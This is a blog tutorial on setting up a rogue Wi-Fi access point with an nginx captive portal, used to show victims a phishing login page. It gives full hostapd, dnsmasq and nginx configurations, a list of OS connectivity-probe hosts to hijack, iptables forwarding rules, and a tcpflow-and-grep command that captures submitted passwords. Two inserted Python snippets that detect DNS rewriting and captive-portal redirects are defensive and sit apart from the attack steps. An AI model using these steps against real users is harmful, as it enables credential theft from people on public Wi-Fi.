How to Set Up a Captive Portal Login with a Rogue AP (nginx)

by hash3liZer, 12 January 2019

In an earlier tutorial, we hosted a Rogue Access Point with hostapd and dnsmasq and later forwarded traffic to provide internet access. Here, we will cover how to set up a captive portal login page that makes the attack more effective by popping up the phishing page, or by showing a sign-in notification, as soon as the user connects to our Access Point. The whole concept of a captive portal login rests on redirection.

So, how does a captive portal work? When a user, let's say a Windows user, connects to the Access Point, Windows makes a request to a predefined connectivity-check site (the site differs between operating systems) and, depending on the response, decides which action to perform. In the captive portal case, if Windows receives a redirection (302) response code from the site, it assumes there is some sort of proxy in place that needs to be authenticated.

The probe is therefore redirected to the rogue website, and Windows conveys our message by asking the user to authenticate with the phishing page. In the Rogue AP tutorial, we used apache as our webserver. Here, we will replace apache with nginx because of its simple configuration and directives.

STEP 1

Installation

To achieve our objective, we will go through the setup step by step. First update your repositories and install nginx and the other required tools:

$ apt update
$ apt install hostapd dnsmasq nginx

Then put your wireless interface in monitor mode:

$ airmon-ng start wlan1

STEP 2

Rogue Access Point

We are about to use hostapd for hosting our Access Point, but this time with a slight amendment. There is also a separate guide to hosting an access point with roguehostapd, which makes the task easier by replacing the full configuration file with a few command-line arguments.

Create and save the hostapd configuration for Access Point:

$ nano /tmp/hostapd.conf
interface=wlan1mon
driver=nl80211
ssid=[Fake AP Name]
hw_mode=g
channel=[Fake AP Channel]
macaddr_acl=0
ignore_broadcast_ssid=0

Start hostapd service:

$ hostapd /tmp/hostapd.conf

STEP 3

DHCP Server

Now we need a DHCP server to set up a small network and provide the connecting users with IP addresses. We will use dnsmasq for the purpose. Create and save a new configuration file for dnsmasq:

$ nano /tmp/dnsmasq.conf
interface=wlan1mon
address=/#/192.168.1.1
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

In the configuration above we used the address directive. It resolves every hostname (the # wildcard) to the single IP given, which in our case is the gateway address where our forged website resides:

address=/#/192.168.1.1

If you want to redirect only a few sites, you have to define an address line for each site individually: a slash, the domain, another slash and the IP it should resolve to. This is the approach to use when you also want to provide internet access to the users. For example:

address=/facebook.com/192.168.1.1
address=/google.com/192.168.1.1
address=/youtube.com/192.168.1.1

We don't want that here, because we want as many redirects as possible: we don't know which site a user is going to request, so we simply redirect them all.
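A defender-side check for the behaviour just described, added here as an example and not part of the original post: a resolver that answers every name, including a reserved .invalid name, with one RFC 1918 address is rewriting DNS the way address=/#/ does, while many names sharing one public address is normal CDN behaviour. The hostnames, answers and the gateway value are constructed sample data.

```python
"""Spot resolver-wide DNS rewriting of the kind address=/#/<ip> produces.
Added example, not part of the original post; hostnames, answers and the
gateway value are constructed stand-ins for real stub-resolver output."""
import ipaddress

# RFC 1918 ranges checked explicitly: a whole resolver collapsing onto one
# private address is a strong signal, whereas many names sharing one public
# address is normal for CDN front ends.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed answers as seen on the rogue AP: everything is the gateway.
HIJACKED = {"example.com": "192.168.1.1", "example.net": "192.168.1.1",
            "example.org": "192.168.1.1", "does-not-exist.invalid": "192.168.1.1"}
# Constructed answers from an honest resolver: unrelated public addresses,
# and the reserved .invalid name (RFC 2606) gets no answer at all.
NORMAL = {"example.com": "203.0.113.10", "example.net": "203.0.113.20",
          "example.org": "203.0.113.30", "does-not-exist.invalid": None}
# Constructed CDN case: one shared public address, NXDOMAIN still honoured.
SHARED_CDN = {"example.com": "203.0.113.5", "example.net": "203.0.113.5",
              "example.org": "203.0.113.5", "does-not-exist.invalid": None}

def is_rfc1918(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)

def analyze(resolutions, gateway=None):
    """Return (hijacked, reasons) for hostname -> IPv4-or-None; gateway is the DHCP default route."""
    reasons = []
    # 1. A name under the reserved .invalid TLD must never resolve.
    for name, ip in resolutions.items():
        if name.endswith(".invalid") and ip:
            reasons.append(f"reserved name {name} resolved to {ip}")
    # 2. Several unrelated zones collapsing onto a single address.
    answers = [ip for ip in resolutions.values() if ip]
    if len(answers) >= 3 and len(set(answers)) == 1:
        shared = answers[0]
        if is_rfc1918(shared):
            reasons.append(f"all {len(answers)} names resolve to private address {shared}")
        if gateway and shared == gateway:
            reasons.append(f"shared answer is the DHCP default gateway {gateway}")
    return bool(reasons), reasons

if __name__ == "__main__":
    for label, data in (("rogue AP", HIJACKED), ("normal", NORMAL), ("cdn", SHARED_CDN)):
        print(label, analyze(data, gateway="192.168.1.1"))
```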

Start dnsmasq service:

$ dnsmasq -C /tmp/dnsmasq.conf -d

Finally, execute these two commands to assign the gateway IP and netmask to your interface:

$ ifconfig wlan1mon up 192.168.1.1 netmask 255.255.255.0
$ route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

STEP 4

Captive Portal

Here the actual work starts. Create a new directory to hold your website and change into it. I will name it captive_portal.

$ mkdir /var/www/captive_portal
$ cd /var/www/captive_portal

Now, download the Rogue AP website and extract the files under this directory:

$ wget https://www.shellvoide.com/media/files/rogueap.zip
$ unzip rogueap.zip -d ./

You should now have the website files under your captive_portal directory. All that remains is to set up the nginx configuration for our captive portal project. First, remove the enabled sites from the nginx configuration directory:

$ rm /etc/nginx/sites-enabled/*

Now create a new configuration file for your captive portal project, place the following directives in it and save the file:

$ nano /etc/nginx/sites-enabled/captive_portal
server {
    listen 80;
    root /var/www/captive_portal;

    location / {
        if (!-f $request_filename) {
            return 302 $scheme://192.168.1.1/index.html;
        }
    }
}

What happens in this nginx configuration is that whenever the client requests a file that does not exist, the request is answered with a 302 redirect to our fake page at 192.168.1.1, which is exactly what we are trying to accomplish. Note that this redirect of non-existent files is the most important part: it is what turns the operating system's connectivity probe into a captive-portal prompt. The root directive specifies the directory where the website is placed. Finally, reload or restart the nginx service:

$ service nginx reload
$ service nginx restart

Check if nginx is correctly serving our fake page:

$ service nginx status
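What the client sees once this configuration is live, added as an example rather than code from the post: a small parser that classifies a connectivity-probe response the way the operating-system logic described in the introduction does, treating a redirect away from the probe host as the captive-portal signal and a 200 with the wrong body as interception. The probe host, expected body and the three raw responses are constructed.

```python
"""Classify a connectivity-probe response the way a client OS does.
Added example, not from the original post: the nginx above answers unknown
paths with a 302 to http://192.168.1.1/index.html, and the client compares
the reply with what its probe expects. All hosts, bodies and responses are
constructed samples."""
import ipaddress
from urllib.parse import urlsplit

PROBE_HOST = "probe.example.net"   # constructed; vendors use their own hosts
EXPECTED_BODY = b"probe-ok"        # constructed; the body a genuine probe returns

# Constructed raw responses as captured on the client side.
ROGUE_302 = (b"HTTP/1.1 302 Moved Temporarily\r\nServer: nginx\r\n"
             b"Location: http://192.168.1.1/index.html\r\nContent-Length: 0\r\n\r\n")
GENUINE_200 = b"HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\nprobe-ok"
SPOOFED_200 = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>Sign in</html>"

def parse_response(raw):
    """Split a raw HTTP/1.x response into (status, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])          # "HTTP/1.1 302 ..." -> 302
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")         # split on the first colon only
        headers[name.strip().lower()] = value.strip()
    return status, headers, body

def classify_probe(raw, probe_host=PROBE_HOST):
    """Return (verdict, detail); verdict is open, captive-portal, intercepted or blocked."""
    try:
        status, headers, body = parse_response(raw)
    except (ValueError, IndexError):
        return "blocked", "no parsable HTTP response"
    if status == 200 and body.strip() == EXPECTED_BODY:
        return "open", "probe body matched"
    if status in (301, 302, 303, 307, 308) and "location" in headers:
        target = urlsplit(headers["location"]).hostname or ""
        if target != probe_host:
            # A redirect away from the probe host is the captive-portal signal;
            # record whether the destination is a private address like 192.168.1.1.
            try:
                private = ipaddress.ip_address(target).is_private
            except ValueError:
                private = False
            where = "private address" if private else "host"
            return "captive-portal", f"redirected to {where} {target}"
    return "intercepted", f"status {status} with unexpected content"
```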

STEP 5

Capture Password

Now that we have a working access point along with a forged page, we need a way to capture the submitted credentials. Previously, we used a MySQL database to store the data. However, there is an even simpler approach: sniff the network and capture what is POSTed. Open a terminal and execute this command:

$ sudo tcpflow -i any -C -g port 80 | grep -i "password1="

What happens here is that we capture all network traffic on every interface and pipe it to grep, which looks for specific lines. The pattern matches the form field that is POSTed when a user enters a password on the Captive Portal Login page and presses Enter. The captured data is printed on screen as it is entered on the forged website.

STEP 6

Internet Forwarding (Optional)

The last step is to provide our users with internet access. Achieving this, however, is a bit tricky. What we need to do is remove or comment out the address line in the dnsmasq configuration, but if we do, the Captive Portal no longer works. So, what to do?

To overcome this complication, i.e. to provide internet access while still serving the Captive Portal, the address directive has to be defined explicitly for a set of given sites. For example, to redirect only Android-based operating systems, the address line would be:

address=/clients3.google.com/192.168.1.1

The same can be applied to other probe sites as well. Several sites have to be redirected correctly for this to work across operating systems. I don't know all of them, but some of the well-known and widely used ones can be configured:

interface=wlan1mon
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

address=/clients3.google.com/192.168.1.1
address=/gsp1.apple.com/192.168.1.1
address=/.akamaitechnologies.com/192.168.1.1
address=/www.appleiphonecell.com/192.168.1.1
address=/www.airport.us/192.168.1.1
address=/.apple.com.edgekey.net/192.168.1.1
address=/.akamaiedge.net/192.168.1.1
address=/captive.apple.com/192.168.1.1
address=/ipv6.msftncsi.com/192.168.1.1
address=/www.msftncsi.com/192.168.1.1

Then restart dnsmasq with this configuration.

Finally, we need another interface that has an internet connection, and traffic will be forwarded between it and the access point interface. My internet-facing interface is named wlan0, and from there I will route traffic for wlan1mon. Execute the following commands with your respective interfaces:

$ iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
$ iptables --append FORWARD --in-interface wlan1mon -j ACCEPT

Now, just one step to go...

$ echo 1 > /proc/sys/net/ipv4/ip_forward

It's all set up. Pick up your mobile, connect to the Rogue Access Point and see for yourself. If you enter a password in the fields and press Enter, the captured data is printed in the tcpflow terminal.

Conclusion

The conclusion that can be drawn from all of the above is that users can easily be tricked into performing unexpected actions when it comes to Wi-Fi. With the help of a captive portal login, the interactivity of the Access Point increases and the attack becomes more effective. Above all, the working of a captive portal rests merely on the principle of redirection.